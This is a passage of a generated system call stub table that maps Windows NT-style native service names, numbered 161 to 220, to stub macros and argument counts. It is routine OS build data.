SYSSTUBS_ENTRY1 161, GetWriteWatch, 3
SYSSTUBS_ENTRY2 161, GetWriteWatch, 3
SYSSTUBS_ENTRY3 161, GetWriteWatch, 3
SYSSTUBS_ENTRY4 161, GetWriteWatch, 3
SYSSTUBS_ENTRY5 161, GetWriteWatch, 3
SYSSTUBS_ENTRY6 161, GetWriteWatch, 3
SYSSTUBS_ENTRY7 161, GetWriteWatch, 3
SYSSTUBS_ENTRY8 161, GetWriteWatch, 3
SYSSTUBS_ENTRY1 162, ImpersonateAnonymousToken, 0
SYSSTUBS_ENTRY2 162, ImpersonateAnonymousToken, 0
SYSSTUBS_ENTRY3 162, ImpersonateAnonymousToken, 0
SYSSTUBS_ENTRY4 162, ImpersonateAnonymousToken, 0
SYSSTUBS_ENTRY5 162, ImpersonateAnonymousToken, 0
SYSSTUBS_ENTRY6 162, ImpersonateAnonymousToken, 0
SYSSTUBS_ENTRY7 162, ImpersonateAnonymousToken, 0
SYSSTUBS_ENTRY8 162, ImpersonateAnonymousToken, 0
SYSSTUBS_ENTRY1 163, ImpersonateThread, 0
SYSSTUBS_ENTRY2 163, ImpersonateThread, 0
SYSSTUBS_ENTRY3 163, ImpersonateThread, 0
SYSSTUBS_ENTRY4 163, ImpersonateThread, 0
SYSSTUBS_ENTRY5 163, ImpersonateThread, 0
SYSSTUBS_ENTRY6 163, ImpersonateThread, 0
SYSSTUBS_ENTRY7 163, ImpersonateThread, 0
SYSSTUBS_ENTRY8 163, ImpersonateThread, 0
SYSSTUBS_ENTRY1 164, InitializeRegistry, 0
SYSSTUBS_ENTRY2 164, InitializeRegistry, 0
SYSSTUBS_ENTRY3 164, InitializeRegistry, 0
SYSSTUBS_ENTRY4 164, InitializeRegistry, 0
SYSSTUBS_ENTRY5 164, InitializeRegistry, 0
SYSSTUBS_ENTRY6 164, InitializeRegistry, 0
SYSSTUBS_ENTRY7 164, InitializeRegistry, 0
SYSSTUBS_ENTRY8 164, InitializeRegistry, 0
SYSSTUBS_ENTRY1 165, InitiatePowerAction, 0
SYSSTUBS_ENTRY2 165, InitiatePowerAction, 0
SYSSTUBS_ENTRY3 165, InitiatePowerAction, 0
SYSSTUBS_ENTRY4 165, InitiatePowerAction, 0
SYSSTUBS_ENTRY5 165, InitiatePowerAction, 0
SYSSTUBS_ENTRY6 165, InitiatePowerAction, 0
SYSSTUBS_ENTRY7 165, InitiatePowerAction, 0
SYSSTUBS_ENTRY8 165, InitiatePowerAction, 0
SYSSTUBS_ENTRY1 166, IsSystemResumeAutomatic, 0
SYSSTUBS_ENTRY2 166, IsSystemResumeAutomatic, 0
SYSSTUBS_ENTRY3 166, IsSystemResumeAutomatic, 0
SYSSTUBS_ENTRY4 166, IsSystemResumeAutomatic, 0
SYSSTUBS_ENTRY5 166, IsSystemResumeAutomatic, 0
SYSSTUBS_ENTRY6 166, IsSystemResumeAutomatic, 0
SYSSTUBS_ENTRY7 166, IsSystemResumeAutomatic, 0
SYSSTUBS_ENTRY8 166, IsSystemResumeAutomatic, 0
SYSSTUBS_ENTRY1 167, ListenPort, 0
SYSSTUBS_ENTRY2 167, ListenPort, 0
SYSSTUBS_ENTRY3 167, ListenPort, 0
SYSSTUBS_ENTRY4 167, ListenPort, 0
SYSSTUBS_ENTRY5 167, ListenPort, 0
SYSSTUBS_ENTRY6 167, ListenPort, 0
SYSSTUBS_ENTRY7 167, ListenPort, 0
SYSSTUBS_ENTRY8 167, ListenPort, 0
SYSSTUBS_ENTRY1 168, LoadDriver, 0
SYSSTUBS_ENTRY2 168, LoadDriver, 0
SYSSTUBS_ENTRY3 168, LoadDriver, 0
SYSSTUBS_ENTRY4 168, LoadDriver, 0
SYSSTUBS_ENTRY5 168, LoadDriver, 0
SYSSTUBS_ENTRY6 168, LoadDriver, 0
SYSSTUBS_ENTRY7 168, LoadDriver, 0
SYSSTUBS_ENTRY8 168, LoadDriver, 0
SYSSTUBS_ENTRY1 169, LoadKey, 0
SYSSTUBS_ENTRY2 169, LoadKey, 0
SYSSTUBS_ENTRY3 169, LoadKey, 0
SYSSTUBS_ENTRY4 169, LoadKey, 0
SYSSTUBS_ENTRY5 169, LoadKey, 0
SYSSTUBS_ENTRY6 169, LoadKey, 0
SYSSTUBS_ENTRY7 169, LoadKey, 0
SYSSTUBS_ENTRY8 169, LoadKey, 0
SYSSTUBS_ENTRY1 170, LoadKey2, 0
SYSSTUBS_ENTRY2 170, LoadKey2, 0
SYSSTUBS_ENTRY3 170, LoadKey2, 0
SYSSTUBS_ENTRY4 170, LoadKey2, 0
SYSSTUBS_ENTRY5 170, LoadKey2, 0
SYSSTUBS_ENTRY6 170, LoadKey2, 0
SYSSTUBS_ENTRY7 170, LoadKey2, 0
SYSSTUBS_ENTRY8 170, LoadKey2, 0
SYSSTUBS_ENTRY1 171, LoadKeyEx, 0
SYSSTUBS_ENTRY2 171, LoadKeyEx, 0
SYSSTUBS_ENTRY3 171, LoadKeyEx, 0
SYSSTUBS_ENTRY4 171, LoadKeyEx, 0
SYSSTUBS_ENTRY5 171, LoadKeyEx, 0
SYSSTUBS_ENTRY6 171, LoadKeyEx, 0
SYSSTUBS_ENTRY7 171, LoadKeyEx, 0
SYSSTUBS_ENTRY8 171, LoadKeyEx, 0
SYSSTUBS_ENTRY1 172, LockFile, 6
SYSSTUBS_ENTRY2 172, LockFile, 6
SYSSTUBS_ENTRY3 172, LockFile, 6
SYSSTUBS_ENTRY4 172, LockFile, 6
SYSSTUBS_ENTRY5 172, LockFile, 6
SYSSTUBS_ENTRY6 172, LockFile, 6
SYSSTUBS_ENTRY7 172, LockFile, 6
SYSSTUBS_ENTRY8 172, LockFile, 6
SYSSTUBS_ENTRY1 173, LockProductActivationKeys, 0
SYSSTUBS_ENTRY2 173, LockProductActivationKeys, 0
SYSSTUBS_ENTRY3 173, LockProductActivationKeys, 0
SYSSTUBS_ENTRY4 173, LockProductActivationKeys, 0
SYSSTUBS_ENTRY5 173, LockProductActivationKeys, 0
SYSSTUBS_ENTRY6 173, LockProductActivationKeys, 0
SYSSTUBS_ENTRY7 173, LockProductActivationKeys, 0
SYSSTUBS_ENTRY8 173, LockProductActivationKeys, 0
SYSSTUBS_ENTRY1 174, LockRegistryKey, 0
SYSSTUBS_ENTRY2 174, LockRegistryKey, 0
SYSSTUBS_ENTRY3 174, LockRegistryKey, 0
SYSSTUBS_ENTRY4 174, LockRegistryKey, 0
SYSSTUBS_ENTRY5 174, LockRegistryKey, 0
SYSSTUBS_ENTRY6 174, LockRegistryKey, 0
SYSSTUBS_ENTRY7 174, LockRegistryKey, 0
SYSSTUBS_ENTRY8 174, LockRegistryKey, 0
SYSSTUBS_ENTRY1 175, LockVirtualMemory, 0
SYSSTUBS_ENTRY2 175, LockVirtualMemory, 0
SYSSTUBS_ENTRY3 175, LockVirtualMemory, 0
SYSSTUBS_ENTRY4 175, LockVirtualMemory, 0
SYSSTUBS_ENTRY5 175, LockVirtualMemory, 0
SYSSTUBS_ENTRY6 175, LockVirtualMemory, 0
SYSSTUBS_ENTRY7 175, LockVirtualMemory, 0
SYSSTUBS_ENTRY8 175, LockVirtualMemory, 0
SYSSTUBS_ENTRY1 176, MakePermanentObject, 0
SYSSTUBS_ENTRY2 176, MakePermanentObject, 0
SYSSTUBS_ENTRY3 176, MakePermanentObject, 0
SYSSTUBS_ENTRY4 176, MakePermanentObject, 0
SYSSTUBS_ENTRY5 176, MakePermanentObject, 0
SYSSTUBS_ENTRY6 176, MakePermanentObject, 0
SYSSTUBS_ENTRY7 176, MakePermanentObject, 0
SYSSTUBS_ENTRY8 176, MakePermanentObject, 0
SYSSTUBS_ENTRY1 177, MakeTemporaryObject, 0
SYSSTUBS_ENTRY2 177, MakeTemporaryObject, 0
SYSSTUBS_ENTRY3 177, MakeTemporaryObject, 0
SYSSTUBS_ENTRY4 177, MakeTemporaryObject, 0
SYSSTUBS_ENTRY5 177, MakeTemporaryObject, 0
SYSSTUBS_ENTRY6 177, MakeTemporaryObject, 0
SYSSTUBS_ENTRY7 177, MakeTemporaryObject, 0
SYSSTUBS_ENTRY8 177, MakeTemporaryObject, 0
SYSSTUBS_ENTRY1 178, MapUserPhysicalPages, 0
SYSSTUBS_ENTRY2 178, MapUserPhysicalPages, 0
SYSSTUBS_ENTRY3 178, MapUserPhysicalPages, 0
SYSSTUBS_ENTRY4 178, MapUserPhysicalPages, 0
SYSSTUBS_ENTRY5 178, MapUserPhysicalPages, 0
SYSSTUBS_ENTRY6 178, MapUserPhysicalPages, 0
SYSSTUBS_ENTRY7 178, MapUserPhysicalPages, 0
SYSSTUBS_ENTRY8 178, MapUserPhysicalPages, 0
SYSSTUBS_ENTRY1 179, ModifyBootEntry, 0
SYSSTUBS_ENTRY2 179, ModifyBootEntry, 0
SYSSTUBS_ENTRY3 179, ModifyBootEntry, 0
SYSSTUBS_ENTRY4 179, ModifyBootEntry, 0
SYSSTUBS_ENTRY5 179, ModifyBootEntry, 0
SYSSTUBS_ENTRY6 179, ModifyBootEntry, 0
SYSSTUBS_ENTRY7 179, ModifyBootEntry, 0
SYSSTUBS_ENTRY8 179, ModifyBootEntry, 0
SYSSTUBS_ENTRY1 180, ModifyDriverEntry, 0
SYSSTUBS_ENTRY2 180, ModifyDriverEntry, 0
SYSSTUBS_ENTRY3 180, ModifyDriverEntry, 0
SYSSTUBS_ENTRY4 180, ModifyDriverEntry, 0
SYSSTUBS_ENTRY5 180, ModifyDriverEntry, 0
SYSSTUBS_ENTRY6 180, ModifyDriverEntry, 0
SYSSTUBS_ENTRY7 180, ModifyDriverEntry, 0
SYSSTUBS_ENTRY8 180, ModifyDriverEntry, 0
SYSSTUBS_ENTRY1 181, NotifyChangeDirectoryFile, 5
SYSSTUBS_ENTRY2 181, NotifyChangeDirectoryFile, 5
SYSSTUBS_ENTRY3 181, NotifyChangeDirectoryFile, 5
SYSSTUBS_ENTRY4 181, NotifyChangeDirectoryFile, 5
SYSSTUBS_ENTRY5 181, NotifyChangeDirectoryFile, 5
SYSSTUBS_ENTRY6 181, NotifyChangeDirectoryFile, 5
SYSSTUBS_ENTRY7 181, NotifyChangeDirectoryFile, 5
SYSSTUBS_ENTRY8 181, NotifyChangeDirectoryFile, 5
SYSSTUBS_ENTRY1 182, NotifyChangeKey, 6
SYSSTUBS_ENTRY2 182, NotifyChangeKey, 6
SYSSTUBS_ENTRY3 182, NotifyChangeKey, 6
SYSSTUBS_ENTRY4 182, NotifyChangeKey, 6
SYSSTUBS_ENTRY5 182, NotifyChangeKey, 6
SYSSTUBS_ENTRY6 182, NotifyChangeKey, 6
SYSSTUBS_ENTRY7 182, NotifyChangeKey, 6
SYSSTUBS_ENTRY8 182, NotifyChangeKey, 6
SYSSTUBS_ENTRY1 183, NotifyChangeMultipleKeys, 8
SYSSTUBS_ENTRY2 183, NotifyChangeMultipleKeys, 8
SYSSTUBS_ENTRY3 183, NotifyChangeMultipleKeys, 8
SYSSTUBS_ENTRY4 183, NotifyChangeMultipleKeys, 8
SYSSTUBS_ENTRY5 183, NotifyChangeMultipleKeys, 8
SYSSTUBS_ENTRY6 183, NotifyChangeMultipleKeys, 8
SYSSTUBS_ENTRY7 183, NotifyChangeMultipleKeys, 8
SYSSTUBS_ENTRY8 183, NotifyChangeMultipleKeys, 8
SYSSTUBS_ENTRY1 184, OpenEventPair, 0
SYSSTUBS_ENTRY2 184, OpenEventPair, 0
SYSSTUBS_ENTRY3 184, OpenEventPair, 0
SYSSTUBS_ENTRY4 184, OpenEventPair, 0
SYSSTUBS_ENTRY5 184, OpenEventPair, 0
SYSSTUBS_ENTRY6 184, OpenEventPair, 0
SYSSTUBS_ENTRY7 184, OpenEventPair, 0
SYSSTUBS_ENTRY8 184, OpenEventPair, 0
SYSSTUBS_ENTRY1 185, OpenIoCompletion, 0
SYSSTUBS_ENTRY2 185, OpenIoCompletion, 0
SYSSTUBS_ENTRY3 185, OpenIoCompletion, 0
SYSSTUBS_ENTRY4 185, OpenIoCompletion, 0
SYSSTUBS_ENTRY5 185, OpenIoCompletion, 0
SYSSTUBS_ENTRY6 185, OpenIoCompletion, 0
SYSSTUBS_ENTRY7 185, OpenIoCompletion, 0
SYSSTUBS_ENTRY8 185, OpenIoCompletion, 0
SYSSTUBS_ENTRY1 186, OpenJobObject, 0
SYSSTUBS_ENTRY2 186, OpenJobObject, 0
SYSSTUBS_ENTRY3 186, OpenJobObject, 0
SYSSTUBS_ENTRY4 186, OpenJobObject, 0
SYSSTUBS_ENTRY5 186, OpenJobObject, 0
SYSSTUBS_ENTRY6 186, OpenJobObject, 0
SYSSTUBS_ENTRY7 186, OpenJobObject, 0
SYSSTUBS_ENTRY8 186, OpenJobObject, 0
SYSSTUBS_ENTRY1 187, OpenKeyedEvent, 0
SYSSTUBS_ENTRY2 187, OpenKeyedEvent, 0
SYSSTUBS_ENTRY3 187, OpenKeyedEvent, 0
SYSSTUBS_ENTRY4 187, OpenKeyedEvent, 0
SYSSTUBS_ENTRY5 187, OpenKeyedEvent, 0
SYSSTUBS_ENTRY6 187, OpenKeyedEvent, 0
SYSSTUBS_ENTRY7 187, OpenKeyedEvent, 0
SYSSTUBS_ENTRY8 187, OpenKeyedEvent, 0
SYSSTUBS_ENTRY1 188, OpenMutant, 0
SYSSTUBS_ENTRY2 188, OpenMutant, 0
SYSSTUBS_ENTRY3 188, OpenMutant, 0
SYSSTUBS_ENTRY4 188, OpenMutant, 0
SYSSTUBS_ENTRY5 188, OpenMutant, 0
SYSSTUBS_ENTRY6 188, OpenMutant, 0
SYSSTUBS_ENTRY7 188, OpenMutant, 0
SYSSTUBS_ENTRY8 188, OpenMutant, 0
SYSSTUBS_ENTRY1 189, OpenObjectAuditAlarm, 8
SYSSTUBS_ENTRY2 189, OpenObjectAuditAlarm, 8
SYSSTUBS_ENTRY3 189, OpenObjectAuditAlarm, 8
SYSSTUBS_ENTRY4 189, OpenObjectAuditAlarm, 8
SYSSTUBS_ENTRY5 189, OpenObjectAuditAlarm, 8
SYSSTUBS_ENTRY6 189, OpenObjectAuditAlarm, 8
SYSSTUBS_ENTRY7 189, OpenObjectAuditAlarm, 8
SYSSTUBS_ENTRY8 189, OpenObjectAuditAlarm, 8
SYSSTUBS_ENTRY1 190, OpenProcessToken, 0
SYSSTUBS_ENTRY2 190, OpenProcessToken, 0
SYSSTUBS_ENTRY3 190, OpenProcessToken, 0
SYSSTUBS_ENTRY4 190, OpenProcessToken, 0
SYSSTUBS_ENTRY5 190, OpenProcessToken, 0
SYSSTUBS_ENTRY6 190, OpenProcessToken, 0
SYSSTUBS_ENTRY7 190, OpenProcessToken, 0
SYSSTUBS_ENTRY8 190, OpenProcessToken, 0
SYSSTUBS_ENTRY1 191, OpenSemaphore, 0
SYSSTUBS_ENTRY2 191, OpenSemaphore, 0
SYSSTUBS_ENTRY3 191, OpenSemaphore, 0
SYSSTUBS_ENTRY4 191, OpenSemaphore, 0
SYSSTUBS_ENTRY5 191, OpenSemaphore, 0
SYSSTUBS_ENTRY6 191, OpenSemaphore, 0
SYSSTUBS_ENTRY7 191, OpenSemaphore, 0
SYSSTUBS_ENTRY8 191, OpenSemaphore, 0
SYSSTUBS_ENTRY1 192, OpenSymbolicLinkObject, 0
SYSSTUBS_ENTRY2 192, OpenSymbolicLinkObject, 0
SYSSTUBS_ENTRY3 192, OpenSymbolicLinkObject, 0
SYSSTUBS_ENTRY4 192, OpenSymbolicLinkObject, 0
SYSSTUBS_ENTRY5 192, OpenSymbolicLinkObject, 0
SYSSTUBS_ENTRY6 192, OpenSymbolicLinkObject, 0
SYSSTUBS_ENTRY7 192, OpenSymbolicLinkObject, 0
SYSSTUBS_ENTRY8 192, OpenSymbolicLinkObject, 0
SYSSTUBS_ENTRY1 193, OpenThread, 0
SYSSTUBS_ENTRY2 193, OpenThread, 0
SYSSTUBS_ENTRY3 193, OpenThread, 0
SYSSTUBS_ENTRY4 193, OpenThread, 0
SYSSTUBS_ENTRY5 193, OpenThread, 0
SYSSTUBS_ENTRY6 193, OpenThread, 0
SYSSTUBS_ENTRY7 193, OpenThread, 0
SYSSTUBS_ENTRY8 193, OpenThread, 0
SYSSTUBS_ENTRY1 194, OpenTimer, 0
SYSSTUBS_ENTRY2 194, OpenTimer, 0
SYSSTUBS_ENTRY3 194, OpenTimer, 0
SYSSTUBS_ENTRY4 194, OpenTimer, 0
SYSSTUBS_ENTRY5 194, OpenTimer, 0
SYSSTUBS_ENTRY6 194, OpenTimer, 0
SYSSTUBS_ENTRY7 194, OpenTimer, 0
SYSSTUBS_ENTRY8 194, OpenTimer, 0
SYSSTUBS_ENTRY1 195, PlugPlayControl, 0
SYSSTUBS_ENTRY2 195, PlugPlayControl, 0
SYSSTUBS_ENTRY3 195, PlugPlayControl, 0
SYSSTUBS_ENTRY4 195, PlugPlayControl, 0
SYSSTUBS_ENTRY5 195, PlugPlayControl, 0
SYSSTUBS_ENTRY6 195, PlugPlayControl, 0
SYSSTUBS_ENTRY7 195, PlugPlayControl, 0
SYSSTUBS_ENTRY8 195, PlugPlayControl, 0
SYSSTUBS_ENTRY1 196, PrivilegeCheck, 0
SYSSTUBS_ENTRY2 196, PrivilegeCheck, 0
SYSSTUBS_ENTRY3 196, PrivilegeCheck, 0
SYSSTUBS_ENTRY4 196, PrivilegeCheck, 0
SYSSTUBS_ENTRY5 196, PrivilegeCheck, 0
SYSSTUBS_ENTRY6 196, PrivilegeCheck, 0
SYSSTUBS_ENTRY7 196, PrivilegeCheck, 0
SYSSTUBS_ENTRY8 196, PrivilegeCheck, 0
SYSSTUBS_ENTRY1 197, PrivilegeObjectAuditAlarm, 2
SYSSTUBS_ENTRY2 197, PrivilegeObjectAuditAlarm, 2
SYSSTUBS_ENTRY3 197, PrivilegeObjectAuditAlarm, 2
SYSSTUBS_ENTRY4 197, PrivilegeObjectAuditAlarm, 2
SYSSTUBS_ENTRY5 197, PrivilegeObjectAuditAlarm, 2
SYSSTUBS_ENTRY6 197, PrivilegeObjectAuditAlarm, 2
SYSSTUBS_ENTRY7 197, PrivilegeObjectAuditAlarm, 2
SYSSTUBS_ENTRY8 197, PrivilegeObjectAuditAlarm, 2
SYSSTUBS_ENTRY1 198, PrivilegedServiceAuditAlarm, 1
SYSSTUBS_ENTRY2 198, PrivilegedServiceAuditAlarm, 1
SYSSTUBS_ENTRY3 198, PrivilegedServiceAuditAlarm, 1
SYSSTUBS_ENTRY4 198, PrivilegedServiceAuditAlarm, 1
SYSSTUBS_ENTRY5 198, PrivilegedServiceAuditAlarm, 1
SYSSTUBS_ENTRY6 198, PrivilegedServiceAuditAlarm, 1
SYSSTUBS_ENTRY7 198, PrivilegedServiceAuditAlarm, 1
SYSSTUBS_ENTRY8 198, PrivilegedServiceAuditAlarm, 1
SYSSTUBS_ENTRY1 199, PulseEvent, 0
SYSSTUBS_ENTRY2 199, PulseEvent, 0
SYSSTUBS_ENTRY3 199, PulseEvent, 0
SYSSTUBS_ENTRY4 199, PulseEvent, 0
SYSSTUBS_ENTRY5 199, PulseEvent, 0
SYSSTUBS_ENTRY6 199, PulseEvent, 0
SYSSTUBS_ENTRY7 199, PulseEvent, 0
SYSSTUBS_ENTRY8 199, PulseEvent, 0
SYSSTUBS_ENTRY1 200, QueryBootEntryOrder, 0
SYSSTUBS_ENTRY2 200, QueryBootEntryOrder, 0
SYSSTUBS_ENTRY3 200, QueryBootEntryOrder, 0
SYSSTUBS_ENTRY4 200, QueryBootEntryOrder, 0
SYSSTUBS_ENTRY5 200, QueryBootEntryOrder, 0
SYSSTUBS_ENTRY6 200, QueryBootEntryOrder, 0
SYSSTUBS_ENTRY7 200, QueryBootEntryOrder, 0
SYSSTUBS_ENTRY8 200, QueryBootEntryOrder, 0
SYSSTUBS_ENTRY1 201, QueryBootOptions, 0
SYSSTUBS_ENTRY2 201, QueryBootOptions, 0
SYSSTUBS_ENTRY3 201, QueryBootOptions, 0
SYSSTUBS_ENTRY4 201, QueryBootOptions, 0
SYSSTUBS_ENTRY5 201, QueryBootOptions, 0
SYSSTUBS_ENTRY6 201, QueryBootOptions, 0
SYSSTUBS_ENTRY7 201, QueryBootOptions, 0
SYSSTUBS_ENTRY8 201, QueryBootOptions, 0
SYSSTUBS_ENTRY1 202, QueryDebugFilterState, 0
SYSSTUBS_ENTRY2 202, QueryDebugFilterState, 0
SYSSTUBS_ENTRY3 202, QueryDebugFilterState, 0
SYSSTUBS_ENTRY4 202, QueryDebugFilterState, 0
SYSSTUBS_ENTRY5 202, QueryDebugFilterState, 0
SYSSTUBS_ENTRY6 202, QueryDebugFilterState, 0
SYSSTUBS_ENTRY7 202, QueryDebugFilterState, 0
SYSSTUBS_ENTRY8 202, QueryDebugFilterState, 0
SYSSTUBS_ENTRY1 203, QueryDirectoryObject, 3
SYSSTUBS_ENTRY2 203, QueryDirectoryObject, 3
SYSSTUBS_ENTRY3 203, QueryDirectoryObject, 3
SYSSTUBS_ENTRY4 203, QueryDirectoryObject, 3
SYSSTUBS_ENTRY5 203, QueryDirectoryObject, 3
SYSSTUBS_ENTRY6 203, QueryDirectoryObject, 3
SYSSTUBS_ENTRY7 203, QueryDirectoryObject, 3
SYSSTUBS_ENTRY8 203, QueryDirectoryObject, 3
SYSSTUBS_ENTRY1 204, QueryDriverEntryOrder, 0
SYSSTUBS_ENTRY2 204, QueryDriverEntryOrder, 0
SYSSTUBS_ENTRY3 204, QueryDriverEntryOrder, 0
SYSSTUBS_ENTRY4 204, QueryDriverEntryOrder, 0
SYSSTUBS_ENTRY5 204, QueryDriverEntryOrder, 0
SYSSTUBS_ENTRY6 204, QueryDriverEntryOrder, 0
SYSSTUBS_ENTRY7 204, QueryDriverEntryOrder, 0
SYSSTUBS_ENTRY8 204, QueryDriverEntryOrder, 0
SYSSTUBS_ENTRY1 205, QueryEaFile, 5
SYSSTUBS_ENTRY2 205, QueryEaFile, 5
SYSSTUBS_ENTRY3 205, QueryEaFile, 5
SYSSTUBS_ENTRY4 205, QueryEaFile, 5
SYSSTUBS_ENTRY5 205, QueryEaFile, 5
SYSSTUBS_ENTRY6 205, QueryEaFile, 5
SYSSTUBS_ENTRY7 205, QueryEaFile, 5
SYSSTUBS_ENTRY8 205, QueryEaFile, 5
SYSSTUBS_ENTRY1 206, QueryFullAttributesFile, 0
SYSSTUBS_ENTRY2 206, QueryFullAttributesFile, 0
SYSSTUBS_ENTRY3 206, QueryFullAttributesFile, 0
SYSSTUBS_ENTRY4 206, QueryFullAttributesFile, 0
SYSSTUBS_ENTRY5 206, QueryFullAttributesFile, 0
SYSSTUBS_ENTRY6 206, QueryFullAttributesFile, 0
SYSSTUBS_ENTRY7 206, QueryFullAttributesFile, 0
SYSSTUBS_ENTRY8 206, QueryFullAttributesFile, 0
SYSSTUBS_ENTRY1 207, QueryInformationAtom, 1
SYSSTUBS_ENTRY2 207, QueryInformationAtom, 1
SYSSTUBS_ENTRY3 207, QueryInformationAtom, 1
SYSSTUBS_ENTRY4 207, QueryInformationAtom, 1
SYSSTUBS_ENTRY5 207, QueryInformationAtom, 1
SYSSTUBS_ENTRY6 207, QueryInformationAtom, 1
SYSSTUBS_ENTRY7 207, QueryInformationAtom, 1
SYSSTUBS_ENTRY8 207, QueryInformationAtom, 1
SYSSTUBS_ENTRY1 208, QueryInformationJobObject, 1
SYSSTUBS_ENTRY2 208, QueryInformationJobObject, 1
SYSSTUBS_ENTRY3 208, QueryInformationJobObject, 1
SYSSTUBS_ENTRY4 208, QueryInformationJobObject, 1
SYSSTUBS_ENTRY5 208, QueryInformationJobObject, 1
SYSSTUBS_ENTRY6 208, QueryInformationJobObject, 1
SYSSTUBS_ENTRY7 208, QueryInformationJobObject, 1
SYSSTUBS_ENTRY8 208, QueryInformationJobObject, 1
SYSSTUBS_ENTRY1 209, QueryInformationPort, 1
SYSSTUBS_ENTRY2 209, QueryInformationPort, 1
SYSSTUBS_ENTRY3 209, QueryInformationPort, 1
SYSSTUBS_ENTRY4 209, QueryInformationPort, 1
SYSSTUBS_ENTRY5 209, QueryInformationPort, 1
SYSSTUBS_ENTRY6 209, QueryInformationPort, 1
SYSSTUBS_ENTRY7 209, QueryInformationPort, 1
SYSSTUBS_ENTRY8 209, QueryInformationPort, 1
SYSSTUBS_ENTRY1 210, QueryInstallUILanguage, 0
SYSSTUBS_ENTRY2 210, QueryInstallUILanguage, 0
SYSSTUBS_ENTRY3 210, QueryInstallUILanguage, 0
SYSSTUBS_ENTRY4 210, QueryInstallUILanguage, 0
SYSSTUBS_ENTRY5 210, QueryInstallUILanguage, 0
SYSSTUBS_ENTRY6 210, QueryInstallUILanguage, 0
SYSSTUBS_ENTRY7 210, QueryInstallUILanguage, 0
SYSSTUBS_ENTRY8 210, QueryInstallUILanguage, 0
SYSSTUBS_ENTRY1 211, QueryIntervalProfile, 0
SYSSTUBS_ENTRY2 211, QueryIntervalProfile, 0
SYSSTUBS_ENTRY3 211, QueryIntervalProfile, 0
SYSSTUBS_ENTRY4 211, QueryIntervalProfile, 0
SYSSTUBS_ENTRY5 211, QueryIntervalProfile, 0
SYSSTUBS_ENTRY6 211, QueryIntervalProfile, 0
SYSSTUBS_ENTRY7 211, QueryIntervalProfile, 0
SYSSTUBS_ENTRY8 211, QueryIntervalProfile, 0
SYSSTUBS_ENTRY1 212, QueryIoCompletion, 1
SYSSTUBS_ENTRY2 212, QueryIoCompletion, 1
SYSSTUBS_ENTRY3 212, QueryIoCompletion, 1
SYSSTUBS_ENTRY4 212, QueryIoCompletion, 1
SYSSTUBS_ENTRY5 212, QueryIoCompletion, 1
SYSSTUBS_ENTRY6 212, QueryIoCompletion, 1
SYSSTUBS_ENTRY7 212, QueryIoCompletion, 1
SYSSTUBS_ENTRY8 212, QueryIoCompletion, 1
SYSSTUBS_ENTRY1 213, QueryMultipleValueKey, 2
SYSSTUBS_ENTRY2 213, QueryMultipleValueKey, 2
SYSSTUBS_ENTRY3 213, QueryMultipleValueKey, 2
SYSSTUBS_ENTRY4 213, QueryMultipleValueKey, 2
SYSSTUBS_ENTRY5 213, QueryMultipleValueKey, 2
SYSSTUBS_ENTRY6 213, QueryMultipleValueKey, 2
SYSSTUBS_ENTRY7 213, QueryMultipleValueKey, 2
SYSSTUBS_ENTRY8 213, QueryMultipleValueKey, 2
SYSSTUBS_ENTRY1 214, QueryMutant, 1
SYSSTUBS_ENTRY2 214, QueryMutant, 1
SYSSTUBS_ENTRY3 214, QueryMutant, 1
SYSSTUBS_ENTRY4 214, QueryMutant, 1
SYSSTUBS_ENTRY5 214, QueryMutant, 1
SYSSTUBS_ENTRY6 214, QueryMutant, 1
SYSSTUBS_ENTRY7 214, QueryMutant, 1
SYSSTUBS_ENTRY8 214, QueryMutant, 1
SYSSTUBS_ENTRY1 215, QueryOpenSubKeys, 0
SYSSTUBS_ENTRY2 215, QueryOpenSubKeys, 0
SYSSTUBS_ENTRY3 215, QueryOpenSubKeys, 0
SYSSTUBS_ENTRY4 215, QueryOpenSubKeys, 0
SYSSTUBS_ENTRY5 215, QueryOpenSubKeys, 0
SYSSTUBS_ENTRY6 215, QueryOpenSubKeys, 0
SYSSTUBS_ENTRY7 215, QueryOpenSubKeys, 0
SYSSTUBS_ENTRY8 215, QueryOpenSubKeys, 0
SYSSTUBS_ENTRY1 216, QueryOpenSubKeysEx, 0
SYSSTUBS_ENTRY2 216, QueryOpenSubKeysEx, 0
SYSSTUBS_ENTRY3 216, QueryOpenSubKeysEx, 0
SYSSTUBS_ENTRY4 216, QueryOpenSubKeysEx, 0
SYSSTUBS_ENTRY5 216, QueryOpenSubKeysEx, 0
SYSSTUBS_ENTRY6 216, QueryOpenSubKeysEx, 0
SYSSTUBS_ENTRY7 216, QueryOpenSubKeysEx, 0
SYSSTUBS_ENTRY8 216, QueryOpenSubKeysEx, 0
SYSSTUBS_ENTRY1 217, QueryPortInformationProcess, 0
SYSSTUBS_ENTRY2 217, QueryPortInformationProcess, 0
SYSSTUBS_ENTRY3 217, QueryPortInformationProcess, 0
SYSSTUBS_ENTRY4 217, QueryPortInformationProcess, 0
SYSSTUBS_ENTRY5 217, QueryPortInformationProcess, 0
SYSSTUBS_ENTRY6 217, QueryPortInformationProcess, 0
SYSSTUBS_ENTRY7 217, QueryPortInformationProcess, 0
SYSSTUBS_ENTRY8 217, QueryPortInformationProcess, 0
SYSSTUBS_ENTRY1 218, QueryQuotaInformationFile, 5
SYSSTUBS_ENTRY2 218, QueryQuotaInformationFile, 5
SYSSTUBS_ENTRY3 218, QueryQuotaInformationFile, 5
SYSSTUBS_ENTRY4 218, QueryQuotaInformationFile, 5
SYSSTUBS_ENTRY5 218, QueryQuotaInformationFile, 5
SYSSTUBS_ENTRY6 218, QueryQuotaInformationFile, 5
SYSSTUBS_ENTRY7 218, QueryQuotaInformationFile, 5
SYSSTUBS_ENTRY8 218, QueryQuotaInformationFile, 5
SYSSTUBS_ENTRY1 219, QuerySecurityObject, 1
SYSSTUBS_ENTRY2 219, QuerySecurityObject, 1
SYSSTUBS_ENTRY3 219, QuerySecurityObject, 1
SYSSTUBS_ENTRY4 219, QuerySecurityObject, 1
SYSSTUBS_ENTRY5 219, QuerySecurityObject, 1
SYSSTUBS_ENTRY6 219, QuerySecurityObject, 1
SYSSTUBS_ENTRY7 219, QuerySecurityObject, 1
SYSSTUBS_ENTRY8 219, QuerySecurityObject, 1
SYSSTUBS_ENTRY1 220, QuerySemaphore, 1
SYSSTUBS_ENTRY2 220, QuerySemaphore, 1
SYSSTUBS_ENTRY3 220, QuerySemaphore, 1
SYSSTUBS_ENTRY4 220, QuerySemaphore, 1
SYSSTUBS_ENTRY5 220, QuerySemaphore, 1
SYSSTUBS_ENTRY6 220, QuerySemaphore, 1
